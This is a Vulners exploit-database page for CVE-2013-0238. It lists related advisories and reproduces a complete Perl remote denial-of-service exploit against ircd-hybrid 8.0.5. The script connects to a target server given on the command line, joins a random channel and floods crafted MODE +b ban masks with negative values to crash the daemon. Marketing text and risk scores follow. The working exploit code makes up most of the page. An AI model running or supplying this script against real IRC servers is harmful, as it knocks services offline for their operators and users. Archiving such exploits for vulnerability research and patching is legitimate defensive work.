Vulners
Lucene search
ircd-hybrid 8.0.5 - Denial of Service
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | ircd-hybrid 8.0.5 Denial Of Service | 12 Apr 201300:00 | – | zdt |
 | CVE-2013-0238 | 13 Feb 201301:00 | – | cve |
 | CVE-2013-0238 | 13 Feb 201301:00 | – | cvelist |
 | [SECURITY] [DSA 2618-1] ircd-hybrid security update | 7 Feb 201322:13 | – | debian |
 | CVE-2013-0238 | 13 Feb 201301:00 | – | debiancve |
 | Debian DSA-2618-1 : ircd-hybrid - denial of service | 8 Feb 201300:00 | – | nessus |
| Mandriva Linux Security Advisory : ircd-hybrid (MDVSA-2013:093) | 20 Apr 201300:00 | – | nessus |
 | ircd-hybrid 8.0.5 - Denial of Service | 12 Apr 201300:00 | – | exploitdb |
 | ircd-hybrid 8.0.5 - Denial of Service | 12 Apr 201300:00 | – | exploitpack |
 | CVE-2013-0238 | 13 Feb 201301:55 | – | nvd |
10
#!/usr/bin/perl
# ircd-hybrid remote denial of service exploit for CVE-2013-0238
# quick and dirty h4x by kingcope
# tested against ircd-hybrid-8.0.5 centos6
# please modify below in case of buggy code.
# enjoy!
use Socket;
srand(time());
$exploiting_nick = "hybExpl" . int(rand(10000));
sub connecttoserver()
{
$bool = "yes";
$iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver");
$paddr = sockaddr_in($ircport, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!");
connect(SOCK1, $paddr) || {$bool = "no"};
}
sub usage() {
print "usage: ircd-hybrid.pl <target> <port>\r\n";
exit;
}
$| = 1;
print "----------------------------------------------------------------------\r\nLets have fun!\r\n";
print "----------------------------------------------------------------------\r\n";
if (!defined($ARGV[1])) {
usage();
}
$ircport = $ARGV[1];
$ircserver = $ARGV[0];
print "Connecting to $ircserver on port $ircport...\n";
connecttoserver();
if ($bool eq "no")
{
print "Connection refused.\r\n";
exit(0);
}
send(SOCK1,"NICK $exploiting_nick\r\n",0);
send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.hax.net\" :$exploiting_nick\r\n",0);
while (<SOCK1>) {
$line = $_;
print $line;
if ((index $line, " 005 ") ne -1) {
goto logged_in;
}
if ((index $line, "PING") ne -1) {
substr($line,1,1,"O");
send(SOCK1, $line, 0);
}
}
logged_in:
print " ok\r\n";
print "Sending buffers...\r\n";
$channelr = int(rand(10000));
send(SOCK1, "JOIN #h4xchan$channelr\r\n", 0);
sleep(1);
$k = 0;
do {
print $_;
$k++;
$crashnum = -1000009 - $k * 1000;
send(SOCK1, "MODE #h4xchan$channelr +b *!*\@127.0.0.1/$crashnum\r\n", 0);
} while(<SOCK1>);
print "done\r\n";
# EOF
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.39225